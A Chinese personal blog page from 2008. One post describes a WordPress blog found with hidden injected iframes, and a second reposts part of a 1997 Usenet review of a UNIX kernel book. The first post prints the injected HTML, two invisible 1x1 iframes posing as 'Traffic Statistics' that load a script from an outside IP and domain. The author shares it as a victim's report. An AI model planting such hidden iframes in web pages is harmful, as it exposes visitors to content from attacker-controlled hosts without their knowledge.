( FEED rss2.0 )

sed /sshd/p -n /var/log/auth.log > /log/sshd.log » 21 days ago

WordPress被注入?还是见鬼了!

Date: 01/30/2008 Tag: wordpress, blog Comments (6)

晚上打开blog首页时感觉相当卡,以为是firefox又在吃内存了,可每次开都卡就奇怪了,打开firebug一查,居然在打开首页时载入了俩个php文件,看文件名是wp-stats.php,以自己根本就没用过这个插件,再一看吓一跳,居然这文件是来自www.wp-stats-php.info和61.132.75.71的,还是放在俩个iframe里,回想一下自己的blog几乎都是自己一个字一个字码上的,就算转贴也不可能转到这样的代码啊。

打开首页原文件一查,居然是出去年十月份的一篇文章的最后。自己可从没在文章里加过广告之类的附加代码,到底是如何而来的。访问61.132.75.71无法打开,再访问www.wp-stats-php.info页面只显示”asasasa”,要不是61.132.75.71无法访问造面blog首页载入变慢估计我到死也想不到自己的blog被人搞进这么恶心的东西。

上网找答案,发现出这情况的还不只我一个:

看来wp确实还存在着这么个不小的漏洞,这也不能怪我没有及时升级版本,2.3.1也有这情况出现。
而据说这事的始作俑者还是中国人,真不晓得该自豪还是悲哀。
目前还不知道有什么好的方法来解决,看来也只能看到一个删除一个了。

Update:忘了,把那段代码贴一下。

<!– Traffic Statistics –><br />
<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe><br />
<!– End Traffic Statistics –><!– Traffic Statistics –> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –></p>

Unix核心介绍

Date: 01/29/2008 Tag: unix, manual Comments (0)

无意间找到这篇写于97年的大作,拜读后觉着值得在blog留个存档。

发信人: syc@cc.ntu.edu.tw (Shiau Yong-Ching), 看板: Linux
标 题: Unix核心 介绍
发信站: National Taiwan University (Wed Jul 9 23:23:08 1997)
转信站: sobee!netnews.ntu!not-for-mail

在出国前, 送给陪伴我大学四年的TAnet & UNIX…

UNIX Internals

The New Fronters

导读

UNIX系统的安装数已经成长到10个,
预料此数字会持续增加中”
– Ken Thompson和Dennis Ritchie
於UNIX程式设计师手册第二版
1972年6月12日

讨论UNIX的书籍很多,但是绝大部分都只是讨论如何使用,讨论UNIX程式设计的书不
多,而介绍UNIX系统核心的书则是更少了..以下是几本有名的书:

* Bach的The Design of the UNIX Operating System, 1986 –讨论System V
Release 2
* Leffler等人, The Design and Implementation of the 4.3BSD UNIX
Operating System, 1988 — 讨论4.3BSD UNIX
* Goodheart和Cox, The Magic Garden Explained, 1994 — 讨论System V
Release 4.0

然而,这些书都只是针对单独的/特定的UNIX系统所写的,很少给读者一个整体的
观点. 而Uresh Vahalia的UNIX Internals — The New Frontiers这本书
则是从一个宏观的角度来看Unix系统.在本书中,作者讨论了商业界,学术界
的各种UNIX系统,详细的介绍了各系统的演算法,并对各系统的优缺点作了
详细而且客观的比较,实在是系统管理员,程式设计师,电脑玩家认识各家
UNIX核心最好的读物.

本书是以介绍UNIX System V Release 4.2为主,并旁徵博引其他各家的UNIX,
以讨论其中利弊得失.出版日期是1996,是介绍UNIX核心的最新参考资料.

我的读後感是没有基础会读起来很辛苦.有UNIX的使用,管理以及程式设计的经验
是必须的,建议Bach的The Design of the UNIX Operating
System也先读过,那麽读这本
书就驾轻就熟了.

本文依序介绍本书中精采的部分,也就是大部分UNIX爱好者想要了解的部分,以飨宴
那些无法读原文书,或者没有时间专研Unix核心者.对於读者的程度没有特定的假设.
介绍的深度也是随兴的,请各位多多包涵.
(more…)

Fresh Articles List

Popular Articles List

Most commented user

Oldies, but Goodies!

Popular Tags

Monthly Archives

iHao Friends

Site Meta